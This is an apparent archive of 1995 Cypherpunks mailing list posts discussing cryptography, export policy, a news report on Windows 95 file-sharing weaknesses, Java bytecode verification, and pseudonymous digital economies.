`Identity Verification using Weighted Personal Characteristics' Y Yamazaki, N Komatsu, M Tsuchiya, SCIS 94 paper 5C (in Japanese) The authors study whether characteristics of a person's handwriting may be used to authenticate that person. They have used a neural net to distinguish persons successfully according to the angles between written strokes. `Comments on "Cryptanalysis of Knapsack Ciphers Using Genetic Algorithms"' F Rubin, Cryptologia v XVIII no 2 (April 1994) pp 153 - 154 The author criticises Spillman's use of genetic algorithms to attack knapsack ciphers as ineffective against the kind of knapsacks actually proposed for nontrivial cryptographic use. `Securenet: a network-oriented intelligent intrusion prevention and detection system' P Spirakis, S Katsikas, D Gritzalis, F Allegre, D Androutsopoulos, J Darzentas, C Gigante, D Karagiannis, H Putkonen, T Spyrou, IFIP SEC 94 paper E2 This paper describes SECURENET, an intrusion detection system being built as an EC RACE project to protect integrated broadband communications. It uses a number of technologies, such as neural networks and secure distributed computation, to detect and classify attacks in real time. `Using a genetic algorithm for optimizing fixed polarity Reed-Muller expansions of Boolean functions' JF Miller, H Luchian, PVG Bradbeer, PJ Barclay, International Journal of Electronics v 76 no 4 (Apr 94) pp 601 - 610. The authors report a genetic algorithm which gets good sub-optimum Reed-Muller expansions of Boolean functions more quickly than previous techniques.
- -Michael From weidai at eskimo.com Sun Nov 12 23:48:34 1995 From: weidai at eskimo.com (Wei Dai) Date: Mon, 13 Nov 1995 15:48:34 +0800 Subject: Diffie-Hellman in GF(2^n)? In-Reply-To: <199511122243.OAA18565@delhi.CS.Berkeley.EDU> Message-ID: > I don't know enough about number theory to judge for myself; > but you can read the (long) paper yourself at > > ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z Thanks for the reference. The paper gives a running time of exp(c(n log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) for discrete log in GF(2^n). However, this paper was published in 1985. There is now an algorithm to calculate discrete logs in GF(p) in exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same directory), so perhaps GF(2^n) isn't so bad after all. Wei Dai From frissell at panix.com Mon Nov 13 00:32:44 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 13 Nov 1995 16:32:44 +0800 Subject: "Industry Group Rebuffs U.S. on Encryption" Message-ID: <199511130204.VAA08135@panix.com> At 05:37 PM 11/9/95 +0100, someone who understandably prefers to be Anonymous wrote: >In only a few decades, crypto's gone from being unheard of to the object >of an increasingly high-profile PR war over "domestic and international >terrorists and criminals." The govt's position, however, hasn't changed >substantially: it doesn't like crypto, and it never will. It has changed substantially. Once "born classified" and subject to prison sentences during WWII, possession and use of crypto is now "legal as church on a Sunday."
The government's position as late as 1978 (later in the case of Admiral Bobby) was that open publication of cryptographic research was good for a free trip to Leavenworth to make little ones out of big ones. [The fact that they threatened a lot more than they actually prosecuted doesn't mean that this wasn't their position.] Things have changed. >There will never >be a time when the cops who pull you over or drop by for a visit will say, >"Ma'am, if you've encrypted that, we respect the fact that you don't want >anyone to see that--so we'll just be going now. You have a nice day, now, >y'hear." And there will never be no cops. It is easy to imagine such a thing since that is exactly what cops do now when they encounter people committing acts which used to be felonies. They ignore them. It is quite possible for social arrangements to change in such a way that the sovereign is no longer held to be able to compel testimony or the surrender of information. Certainly, technological changes can make cases where the cops are aware that you provably possess information rare. There were no nation states or cops prior to 1600. It is perfectly possible that there will be no nation states or cops at some point in the future. Since policing is a labor intensive occupation and as currently organized suffers from socialist inefficiency, it may well be disintermediated. Thus, cryptographic protocols can (if desired) practically exclude the possibility of theft (of digital goods). And if the bulk of the world's economy consists of digital goods/services (measured by value not volume or weight obviously) then computers and crypto may be enough. Nanotechnology may make self defense more efficient than "others" defense and may make it so easy to defend against state power that it brings on the collapse of the nation state. Technological changes bring social changes. Full nanotechnology may not even be necessary. A computer is a nanomachine.
The capabilities of these toys and the networks they run on may be enough in and of themselves to weaken monopoly institutions of coercion beyond their tipping points. DCF "Jan, you remember what happened 10 years ago today, don't you? The world ended. As we know it don't you mean?" -- Too much Firesign Theater, not enough Calculus. From nobody at REPLAY.COM Mon Nov 13 00:33:42 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 13 Nov 1995 16:33:42 +0800 Subject: Love Bugs Message-ID: <199511110054.BAA15772@utopia.hacktic.nl> The Nov 11 WSJ reports on the scare tactics of security consultants in the U.S. and by their co-conspiring counterparts -- spies -- abroad: Richard Heffernan, an information-security specialist for 30 years, said his clients sometimes return to their hotel rooms to find their belongings ransacked, especially in Europe. Some European companies will pay as much as $10,000 for the laptop of a Fortune 500 executive, he adds. Watch out for tiny surveillance tools. In 1992, the Canadian government reportedly warned businessmen that the French intelligence service was bugging airline seats and using undercover agents as flight attendants. Penlight cameras placed above airline seats can make readable photos of laptop screens. Spies on planes can overhear conversations from several seats away. Look for them in business suits with plenty of luggage, says security consultant Kevin Coffey. "These guys fit in." Another consultant estimates that 45% of bugs are on fax machines, and one group of U.S. executives inadvertently gave their secrets to the competition by using the fax machine at Moscow's upscale Metropol Hotel, which is staffed with former FBI and KGB operatives. If you are carrying extremely sensitive information, be especially paranoid. All this may be too much for some companies, who say they don't have time to evade possible spies. Rather than take the trouble, some companies end up postponing business plans abroad, saying, "Forget it.
We'll come back in a few years." That's what they said at the office, now listen to the bug up Gigi's. From llurch at Networking.Stanford.EDU Mon Nov 13 00:44:42 1995 From: llurch at Networking.Stanford.EDU (Richard Charles Graves) Date: Mon, 13 Nov 1995 16:44:42 +0800 Subject: MS Corrects Press Release on "Samba" Security Problem Message-ID: <4814sh$i3g@Networking.Stanford.EDU> The Win95 product manager let me know yesterday that they'd corrected some of the errors on their Web server. I'm sure Microsoft is planning to publicize the changes in greater detail, so I'll just summarize them here. Load the original security bugfix news release at gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side with the corrected version now at http://www.microsoft.com/windows/software/w95fpup.htm to see the changes. Notable corrections are: 1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends "illegal commands" across the network. 2. Microsoft is now a bit more forthright in acknowledging that the problem applies to all language versions of Win95. They didn't change the date, and they still say that Samba is shareware. And they still fail to give proper credit to the third parties that actually found the problems for Microsoft. Oh well, can't have everything. Microsoft has also promised that localized (foreign-language) versions of the "updated files that address the issue" will be made available within two weeks. I still don't understand what the hold-up is, but a time frame is good. In addition, Microsoft is reconsidering the position of the NE4100 and certain NE2000- compatible PCMCIA cards like the EFA-207 on the hardware compatibility list because, well, they aren't. Yusuf has given his imprimatur of Official Microsoft Response to the discussion of the well-known IPX SAP routing and security issue saved at gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. 
Previously this had only been posted with the "speaking only for myself" disclaimer. Microsoft had acknowledged only the specific "server name conflict issue" covered by PC Week, not the underlying general problem that has been widely discussed on Usenet. Maybe we'll get a good article into the Knowledge Base now. I'm still hoping they'll document the known and acknowledged ProviderPath problem with wsock32.dll. Progress comes slowly. -rich From stevenw at best.com Mon Nov 13 00:59:37 1995 From: stevenw at best.com (Steven Weller) Date: Mon, 13 Nov 1995 16:59:37 +0800 Subject: Vannevar Bush, Ultra, and the Other Memex Message-ID: I borrowed an interesting book from the library a while ago: _Information and Secrecy. Vannevar Bush, Ultra, and the Other Memex_. If this is old hat, please ignore. It covers the history of computing and comparing machines from the early 1900's to about 1950 -- devices employing photocells, relays, gas-filled tubes, microfilm, punched optical tape, mechanical integrators, etc. There is a fair amount of crypto relevance as it passes through WWII and the cracking of cyphers becomes important. It's also a tale of overly-ambitious projects that rarely worked, bureaucratic bumbling, influence, and ignorance. _Information and Secrecy. Vannevar Bush, Ultra, and the Other Memex_. Colin Burke The Scarecrow Press Inc. 1994 ISBN 0-8108-2783-2 ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs."
stevenw at best.com | -- Time Magazine, 3 July 1995 From bglassle at kaiwan.com Mon Nov 13 01:13:41 1995 From: bglassle at kaiwan.com (Bob Glassley) Date: Mon, 13 Nov 1995 17:13:41 +0800 Subject: Lotus Notes RSA Implementation Question In-Reply-To: <9511102035.AA6927@moe.iris.com> Message-ID: <199511110613.WAA18615@kaiwan.kaiwan.com> -----BEGIN PGP SIGNED MESSAGE----- On 10 Nov 95 11:15:42 EDT, Charlie Kaufman wrote: >>1) What is the key size used by the USA licensed version? >> >Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA >and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for >encryption in the exportable version and bigger keys for signatures in all >versions and for encryption in the USA version. I'm not sure I'm allowed to say >what the key size will be ahead of the product shipping. I would assume since they are using a key size >40 bit, it is used for authentication only, not for data encryption, that would skirt the ITAR regs. In fact according to the docs, there is no data encryption when connecting to an international version server, regardless of the client version. I would assume that a >512 bit key in V4 would allow upwards of 1024 or better. That should be sufficient for now. >>2) Considering RC4 is a proprietary scheme, have there been any >>concerted efforts to validate its strength or lack of? If so, could >>you give a pointer to any documents I could review. >> >There has been considerable discussion of the security of RC4 on this list, and >some subtle (i.e. worrisome but not disastrous) weaknesses have been >found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed >to date because it does not encrypt recognizable plaintext with the first few >bytes of the RC4 stream. My understanding was that the problems exposed with RC4 that you mentioned, were with the particular implementation by Netscape. I guess I better go back to the archive and do some reading.
:-) Thanks, for the info. Bob Glassley From tjunker at phoenix.phoenix.net Mon Nov 13 01:17:12 1995 From: tjunker at phoenix.phoenix.net (Thomas Junker) Date: Mon, 13 Nov 1995 17:17:12 +0800 Subject: mailing list. Message-ID: <199511110707.BAA04164@phoenix.net> On 10 Nov 95 at 13:34, David.Y at freedomnet.com (David Y) wrote: > Subject: mailing list. > Please put me on your mailing list, thanks. Sure. Consider it done. ------------------------- Weak attempt at crypto relevance: Couldn't trusted date/time-stamping signing robots be used to establish that offline ecash particles had reached certain points in their journey? Might not a bank say that in the event of a dispute, it will accept the ecash copy signed earliest by Framis Signer or specified alternate with claimant's ID inside the disposable signature wrapper? I suppose one might just as well authenticate the ecash with the bank itself, except that the signed copy allows withholding identity unless and until there is a dispute. ------------ http://www.phoenix.net/~tjunker ------------ | Your freedom is on the auction block. What do you bid? | --------------------------------------------------------- Unofficial Wang VS Information Center From Atp3000 at aol.com Mon Nov 13 01:18:39 1995 From: Atp3000 at aol.com (Atp3000 at aol.com) Date: Mon, 13 Nov 1995 17:18:39 +0800 Subject: coding and nnet's Message-ID: <951111003859_103654167@mail06.mail.aol.com> Thanks for your input. Thus, it does make a lot of sense after some explanation.
Atp3000 From an407769 at anon.penet.fi Mon Nov 13 01:23:07 1995 From: an407769 at anon.penet.fi (jerry the golden retriever) Date: Mon, 13 Nov 1995 17:23:07 +0800 Subject: hacker's dream Message-ID: <9511110629.AA27945@anon.penet.fi> Windows 95 Is A Hacker's Dream Over The Internet CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the Internet, could be a dream made in hacker heaven. From seasoned propeller heads Newsbytes has contacted, it looks like Windows 95 could be more of a security nightmare than was first thought. This is especially true where fixed link companies are concerned. An investigation of the new operating system, when hooked onto the Internet, leaves computers wide open. Executing a series of simple, uncomplicated commands opens up company and private users' computers to hacking the moment they access the Internet, claim some analysts. Worse, they may never know it has been done. Using a simple Unix command, a hacker can locate the IP (Internet protocol) address of the subscriber logged into an Internet service provider. Then he needs only one more thing; a logged-on Internet user using Microsoft's new operating system. For businesses with leased line Internet links, it can happen at any time, day or night. Once the IP address has been noted, the hacker simply creates a file through DOS on his own system, specifying the address and naming it. Using two other commands -- which purge the remote names on the IP, or Internet provider's port -- the system then refreshes and remaps itself in preparation to be accessed by the hacker's computer. Because Windows 95 is designed with a networking capability, it leaves all computers in the office open to illegal access. Once the hacker has called up his Map Network Drive, the hard disk on his own machine cannot be differentiated from that of the genuine user. All that need be done then is to put in a common drive name, most obviously "C:\." For networked machines, the default "C$" is common. 
This gives access to all files on the subscriber's drive. While Windows 95 allows the user to protect the drive by giving it a password, computer experts Newsbytes talked to said that device won't necessarily lock out intruders. Because the operating system has no "audit" trail -- in other words, it does not log who or how someone is accessing the drive -- a hacker can spend weeks trying to discover the password. Password search programs, like Cracker, are readily available and can break through most simple password sequences. (Joel McCormick & I.T. Daily/19951109) --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From frantz at netcom.com Mon Nov 13 01:26:23 1995 From: frantz at netcom.com (Bill Frantz) Date: Mon, 13 Nov 1995 17:26:23 +0800 Subject: POTP Security Message-ID: <199511110657.WAA04599@netcom16.netcom.com> At 19:30 11/10/95 -0500, jgrubs at left.webcasters.com wrote: >>The first commercially available implementation of our >>POTP (Power One Time Pad) encryption algorithm. The package includes >>a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - >>a stand alone file encryption program. >What level of security does this cute, little puppy provide??? Since they advertize One Time Pad security, the first thing I want to know is how they distribute their keys. One Time Pads require a key as long as the encyphered message. A one-time-pad system without a convincing story about key distribution is bullshit. Bill ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. 
frantz at netcom.com Los Gatos, CA 95032, USA From anonymous-remailer at shell.portal.com Mon Nov 13 01:29:45 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 13 Nov 1995 17:29:45 +0800 Subject: Java insecurity - long - argumentative - you are warned. Message-ID: <199511110538.VAA18697@jobe.shell.portal.com> On Tue, 7 Nov 1995, Dietrich J. Kappe wrote: > >>> While all this checking appears excruciatingly detailed, by the time > >>> the byte code verifier has done its work, the Java interpreter can > >>> proceed knowing that the code will run securely. Knowing these > >>> properties makes the Java interpreter much faster, because it doesn't > >>> have to check anything. > > > >Yikes!! I'll leave this for someone else to address. This sounds to me > >like a variation on virus scanning. I think that there are far more > >reputable virus experts than I who can comment and expand on *flaws* with > >that approach. > > This "checking," as any comp-sci undergrad will tell you, amounts to solving > the halting problem for the java interpreter. While this is possible for a > finite state automata like the java interpreter (made more difficult by the > fact that it can use the "net" for additional state), it is not even > remotely feasible. OK, so by saying that it is not "even remotely feasible", you're saying that any comp-sci undergraduate will say that it can't be done? That is what "not even remotely feasible" means, doesn't it?? I mean, even if Marketing wants this problem solved, that won't be enough? > If you can write a checker that works in a reasonable amount of time, I'll > write a turing machine simulator that'll do something nasty if the input > machine halts. Then we'll split the fame and fortune for solving the 5 state > Busy Beaver problem. Deal? I'm sorry, I only work for T-shirt and mug contests. That fifteen minutes of fame thingy, just isn't my cup of tea.
> Dietrich Kappe | Red Planet http://www.redweb.com > Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key > 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt > Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From wilcoxb at nagina.cs.colorado.edu Mon Nov 13 02:20:50 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Mon, 13 Nov 1995 18:20:50 +0800 Subject: technical and social structures in the pseudonymous economy Message-ID: <199511100450.VAA26914@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- When a person does business pseudonymously (where I consider pseudonymity to be == anonymity & non-repudiation & two-way communication (where non-repudiation presupposes some sort of identifier of the actor)) then that person is exempt (for the most part) from the threat of physical retribution, the force of law, etc. Thus in order to be trusted with some valuable information such as money this person needs to offer up some collateral which can be debited in the case that they violate their contract. Of course this raises the question of who holds the collateral, and it is a big open spot where statists might jump in with their tired old rhetoric (as soon as they clue in to what's going on here), but I sincerely hope that a highly redundant, interdependent, robust set of private "lien, escrow and arbitration" agencies take up the job. As a simple example, pseudonymous E-bank customers can be required to keep positive balances in their accounts, and in the case that they are caught trying to double-spend or commit other fraud, a fine can be withdrawn from this account by the bank. This model can be applied to any pseudonymous transaction or contract.
It is important to note that this technique does *not* eliminate the risk of fraud-- it reduces the likelihood that the pseudonymous customer can commit fraud successfully and it *increases* the likelihood that the bank can do so. Of course this is not necessary if we are not giving the pseudonym any opportunity to cheat us (because we are using all on-line clearing etc.) but for most (I think) applications it is necessary to extend to the pseudonym some amount of trust, in the form of a "loan" or other credit, or, in the form of other digital credentials, access to information etc. etc. I consider this to be a very important idea for the development of the cyberspace economy/community/libertaria and as I mentioned it is a point where it would be more easy for the statists to attempt an inroad into said community. I envision a situation in which a pseudonym cannot cheat anyone out of more money than he has already put up as collateral on his contract. Thus mere cyber-fraud is never profitable. Instead, the only way to cheat people is to subvert the escrow&arbitration agencies into ruling unfairly in your favor, allowing you to abscond with your collateral and so forth. This, unfortunately, moves the whole mess of "law and society" from the elegant cryptographic solutions that we all love back into the realm of politics, social ideology and so forth, but I think we are in a better position to insure fair dealings now that we have these cryptographic capabilities like non-repudiation & privacy, and the currency & transaction protocols which follow from them. Note that because the escrow&arbitration agencies are likely to be large, redundant and interdependent a petty criminal will not have much chance of subverting them, but a major one-time heist is theoretically effective, as is the organized, large-scale extortion which does not heist it all at once but which instead siphons off an extortion (tax) payment at regular intervals. 
(Note strong resemblance between this last criminal strategy and the behavior of most governments.) Of course I'm not the first to think about these kinds of things. Nick Szabo (szabo at netcom.com) in particular has thought a lot about making the escrow&arbitration process mathematically deterministic, when he talks about his "liens" and "smart contracts", but my intuition is that the domain of contracts which are amenable to mathematically-controlled escrow&arbitration is much smaller than the domain of contracts which need a trusted intelligence to do the escrow&arbitration. (Nick also discusses the trusted-intelligence issues, such as using n-of-m key splitting to distribute the arbitration power.) In summary: lien, escrow and arbitration agencies, which are endowed by the principals with the authority to adjudicate fraud cases, and which are entrusted by the principals with the electronic cash, crypto keys, and so forth to enforce their decisions, will be essential to the operation of the pseudonymous economy. These agencies will themselves be the targets and/or the perpetrators of theft, however. Concerned citizens of the world need to start thinking about how to minimize these risks. Factors to consider include: The relatively low start-up costs of such agencies, the role of governments, mafia, or other force-wielding organizations, and "the problem of pseudonymity" (can't tell if two pseudonyms are under same True Person's control) possibly leading to a single organization controlling a large enough share of escrow&arbitration services that it can initiate heists or extortion. I'll be trying to write these ideas of mine into a set of HTML documents for display on my web pages. I appreciate all constructive correspondence. (P.S. Of course a pseudonym's reputation may be considered by some to be valuable enough to use as this "collateral" or "lien". It wouldn't be so considered by me. I'd take cash.)
Regards, Bryce signatures follow "To strive, to seek, to find and not to yield." bryce at colorado.edu From remailer at armadillo.com Mon Nov 13 02:57:31 1995 From: remailer at armadillo.com (Armadillo Remailer) Date: Mon, 13 Nov 1995 18:57:31 +0800 Subject: Worth of Crypto Consulting Message-ID: <199511090735.BAA01846@monad.armadillo.com> Hi all, I have been doing some crypto consulting to small businesses for a while, but it looks like I may be swimming with bigger fish in the near future. I was wondering what "real" crypto consultants are getting these days. I will be advising these people on the security of systems others are developing, and helping them develop their own software, but I have no idea what the market value of my time is. Reply to the list, or send a message encrypted to the key below to alt.anonymous.messages with the subject "anonymous consultant". Many thanks, Anonymous Consultant From ses at tipper.oit.unc.edu Mon Nov 13 02:57:34 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 13 Nov 1995 18:57:34 +0800 Subject: Java's verifier (was Re: Java insecurity - long - argumentative - you are warned.) In-Reply-To: Message-ID: On Tue, 7 Nov 1995, Dietrich J.
Kappe wrote: > > This "checking," as any comp-sci undergrad will tell you, amounts to solving > the halting problem for the java interpreter. While this is possible for a [...] > If you can write a checker that works in a reasonable amount of time, I'll > write a turing machine simulator that'll do something nasty if the input > machine halts. Then we'll split the fame and fortune for solving the 5 state Yeah, but when you graduate, they let you in to the real secret- if a problem is NPC or Undecidable, either use some wild guesswork (oops, heuristic), or try solving enough of the problem to be usable. The java verifier not only terminates, but runs in time linear to the size of the program to be verified. This is because the verifier doesn't really calculate whether a program is safe or not; it determines whether it can prove that the program is safe or not. It's possible to generate sequences of bytecodes that do not perform unsafe accesses, yet which are still rejected by the verifier because they violate its requirements. The verifier can be considered to be an abstract interpretation over the depth and type-state of the operand stack. If the state is known before an instruction, it is always known after that instruction, and if there is more than one way to arrive at an instruction, each control path must arrive at that instruction with the same typestate.

Examples (not real JavaVM, but similar)

load-int == push an int onto the stack.
    before: ...
    after : ...,int

load-float == push a float onto the stack
    before: ...
    after: ...,float

add-int == pop two ints off the stack, push sum onto stack
    before: ...,int,int
    after: ...,int

blt == pop an int off the stack, compare to val, and jump to address add if int is less than val
    before: ...,int
    after: ...

jmp == jump to address add
    before: ...
    after: ...

VALID
    load-int 1        ; stack = (int)
    load-int 1        ; stack = (int), (int)
    add-int           ; stack = (int)

INVALID
    load-int 1        ; stack = (int)
    load-float 1.0    ; stack = (int) (float)
    add-int           ; error, stack != (int), (int)

VALID
    load-int 2        ;stack = (int)
    blt 1, a          ;stack = null
    load-int 3        ; stack = (int)
    jmp b             ; stack = (int)
a   load-int 1        ; stack = (int);
b   load-int 4        ; stack = (int) (int)
    add-int           ; stack = (int)

INVALID
    load-int 2        ;stack = (int)
    blt 1, a          ;stack = null
    load-float 3      ; stack = (float)
    jmp b             ; stack = (float)
a   load-int 1        ; stack = (int);
b   load-int 4        ; stack = ERROR (float || int)
    add-int           ; stack = (int) ERROR

This last example is invalid, even though it's possible in this case to show dynamically that the program will always arrive at b with an int on the stack; there are still two control paths that arrive at b, one with an int, the other with a float. I hope this makes sense Simon From jrl at trel.demon.co.uk Mon Nov 13 03:12:09 1995 From: jrl at trel.demon.co.uk (John Lewell) Date: Mon, 13 Nov 1995 19:12:09 +0800 Subject: Who needs time vaults anyway? Message-ID: Dan Oelke writes: >Now, if we just had objects between 1 and 10 light years away >that you could bounce lasers off of...... ;-) There are plenty of objects out there. But isn't there some danger of attracting the attention of high-spending aliens? ---------------------------------------------------------------------------- John Lewell...66a St John's Wood High Street London NW8 7SH United Kingdom tel: +44 171 722 3098...fax: +44 171 483 1063....email: jrl at trel.demon.co.uk Trel...The Commercial Internet Product Finder.. From shields at tembel.org Mon Nov 13 04:05:11 1995 From: shields at tembel.org (Michael Shields) Date: Mon, 13 Nov 1995 20:05:11 +0800 Subject: Who needs time vaults anyway? In-Reply-To: <199511110843.AAA18344@infinity.c2.org> Message-ID: <4845bj$7gb@yage.tembel.org> -----BEGIN PGP SIGNED MESSAGE----- Ack. Corrections.
In article <483l88$1f0 at yage.tembel.org>, I wrote: > You could do this with a reflector $ct/2$ metres away, assuming your > opponent and you are in the same location. Also assuming your attacker cannot use the information until he can get it back to Earth, or else he could just race towards the reflector and catch it on the way back. > the diameter of the solar system is about 5.4 light-hours The *radius* of the solar system is about 5.4 light-hours. -- Shields. From chen at intuit.com Mon Nov 13 04:06:25 1995 From: chen at intuit.com (Mark Chen) Date: Mon, 13 Nov 1995 20:06:25 +0800 Subject: POTP Security In-Reply-To: Message-ID: <9511120717.AA25332@doom> > On 11 10 95 jgrubs at left.webcasters.com inquired about POTP > security: > > What level of security does this cute, little puppy provide??? > > > One approach to answering that inquiry is an excerpt from: > > Date: Sat, 21 OCT 95 10:58:51 -0500 > From: Paul Jackman > Newgroups: talk.politics.crypto > Subject: Re: Elementrix One-Time Pad > > > ...mine [Jackman's background and experience] goes back to 1961 > as Crypto Communications Control Command Center Supervisor for > the National Security Agency (NSA), and US Army Intelligence > Security. Even so, I do not consider myself expert in either the > technical sense or the historical sense. But, I know enough not > to comment on algorithms that I don't have access to. > > The algorithm will be published when patent protection is assured. > It is currently patent pending in several countries. > > As far as marketing goes, this product is not going to disappear.
> We have been premarketing security technology for four years through > beta, and one year in pilot with international Fortune 100 companies. > The initial presentations on Internet about a year ago showed us that > the newness and complexity of the Algorithm had to be presented > one on one to the experts which Elementrix has done. There is a > long parade of companies that have implemented this technology but > do not wish to be named, (Typical of any security implementation. > Those who do acknowledge the integrity of the products are noteworthy, > Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun > Mergent, and there will be many more. Also noteworthy are those who have examined the product under NDA and declined to give an endorsement. -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From mark at lochard.com.au Mon Nov 13 04:09:40 1995 From: mark at lochard.com.au (Mark) Date: Mon, 13 Nov 1995 20:09:40 +0800 Subject: Market Value of Web Pages In-Reply-To: Message-ID: <199511130035.AA32505@junkers.lochard.com.au> >>If you toss arguments like this at some of the sites that would be viable for >>the hit numbers and then explain the only way that will occur is if the crypto >>laws are repealed, you will create a lot more lobbiers annoying their reps >>for the cause. ecash without good crypto is like the Federal Reserve >>delivering cash with open pickup trucks. Or doing credit card purchases on >>postcards. > >And if you make arguments that this is easy to do, and add that crypto laws >are stopping this from happening, you risk losing your credibility. > >The current crypto export laws are a pain, but are not stopping these >"million hits a day" transactions. Recall that the 40 bits allowed in >Netscape for export took some non-trivial number of machine-hours to crack >(I'm talking about the brute force crack by Damien G.
and others, not the >more recent exploitation of the RNG weakness). While this brute force crack >showed the limitations of the 40-bit key for certain transactions, it is >not a viable attack on a single transaction whose value is pennies. My point was (and I failed to mention it :) that to protect against stolen funds you need to encrypt the transactions using strong crypto. Amongst US jurisdictions this is possible so long as you license the technologies... so be it. The achilles heel for global secure business from the US is the ITAR limitations. This weakens the crypto to levels that are breachable by quite a lot of people. As machines get faster and the ITAR laws keep the MTTB (Mean Time To Break) down it will become more and more efficient to collect and exploit electronic cash or credit cards. In other words, if you want to run a trusted global electronic cash based business then you need strong crypto otherwise someone will break your transfers and therefore reputation and no one will want to do business with you over the inet. At the very least it will cost you PR $ to curb any damage done. Just ask Netscape. You can live fine with the 250 million people in the US buying your product, but with 5 billion potential users out there globally, (with various degrees of connectivity), it makes sense to enable them to buy from you too. Off topic: Personally I don't see the relevance of ITAR and crypto any more. When was the last time any one was prosecuted under its statutes? What is the point of banning exportation of software which is widely available outside the US anyway? It's idiocy. Any foreign power or cartel wanting secure comms is not going to balk at using any method that can, irrespective of its legality in the eyes of the US. With their resources they can construct secure OTP systems by sending in people with a couple of "music CDs" in their briefcase.
Mark
mark at lochard.com.au

From perry at piermont.com Mon Nov 13 04:32:35 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 13 Nov 1995 20:32:35 +0800
Subject: DejaNews all over again
In-Reply-To: <199511131056.CAA06282@jobe.shell.portal.com>
Message-ID: <199511131202.HAA01945@jekyll.piermont.com>

I, too, would advise NetScape to ignore this loon. Whether the person behind it is "Dr." you-know-who or Detweiler or some third party loon is immaterial. The fact of the matter is that although NetScape has had security issues, the ones brought up by "Alice" are totally bogus.

.pm

anonymous-remailer at shell.portal.com writes:
> On Sat, 11 Nov 1995, Ray Cromwell wrote:
>
> >> I think "Jeff" ... Mr. unofficial not speaking for the company Netscape
> >> spokesperson, I think that you should rethink what you're suggesting.
> >> Your tactics won't serve your personal interests on this one. I really
> >> would recommend that you come clean. This is not about "gloating". I
> >> really take very little pleasure in this.
> >
> > Jeff, I think it's in your best interest to not waste your time
> > responding to this moron (who bears many features in common with
> > Detweiler)
>
> I'm sure that most lawyers are probably advising Netscape's founders
> to not respond -- just like Fuhrman, they should take the fifth
> on this one.
>
> Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this
> smells like a failure to disclose a material event. Netscape stock has
> advanced almost 50% since the Bugs Bunny post.
>
> Some investors are gonna be mighty pissed.
>
> Then again, what would I know ...
>
>
>
> Alice de 'nonymous ...
>
> ...just another one of those...
> ...hunters...
>
> P.S. This post is in the public domain.
> C. S. U. M. O. C. L. U. N. E.
>
>

From tcmay at got.net Mon Nov 13 04:36:33 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 13 Nov 1995 20:36:33 +0800
Subject: coding and nnet's
Message-ID:

At 11:40 PM 11/11/95, Michael Pierson wrote:

>I wouldn't be surprised to learn of somebody like FinCEN using
>neural-net systems to do pattern analysis on funds transfers and
>the like, or the NRO or NSA investing research money into investigating
>the usefulness of NNs for image processing or for scanning raw ELINT,
>SIGINT or COMINT data. In fact, I'd be quite surprised if they weren't.

These are well-known applications. The drug enforcement folks have programs running at a place called the "El Paso Information Center" (EPIC), from what I recall. Analyzing flights, passenger lists, etc., using various AI/pattern recognition programs. (Some say the El Paso locale has tendrils reaching to E Systems, Cray installations, etc., but I wouldn't know.)

I recall reading of some contracts let out, and other RFCs, for AI programs for FinCEN use. Not surprising. (If I ran FinCEN, this is what I'd surely have a bunch of folks working on. Scary thought.)

A bunch of AI-oriented job shops, such as Kestrel Institute and ADS, have links to intelligence and law enforcement. Really too many possible examples, and not surprising.

>While NNs may not be of direct relevance to cryptanalysis, I suspect
>they are, or will be, of great relevance to the task of identifying
>what communications should be cryptanalyzed or otherwise scrutinized.
>Especially given the high volume of traffic our 'thinkpol' aspire to
>be able to listen to.

Sure. Preprocessing of intercepts and signals, etc., is a natural application. The point about neural nets not likely to be used in pure cryptanalysis was a carefully limited point.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From llurch at Networking.Stanford.EDU Mon Nov 13 04:37:05 1995
From: llurch at Networking.Stanford.EDU (Richard Charles Graves)
Date: Mon, 13 Nov 1995 20:37:05 +0800
Subject: MS Corrects Press Release on "Samba" Security Problem
Message-ID: <199511130517.VAA21401@comsec.com>

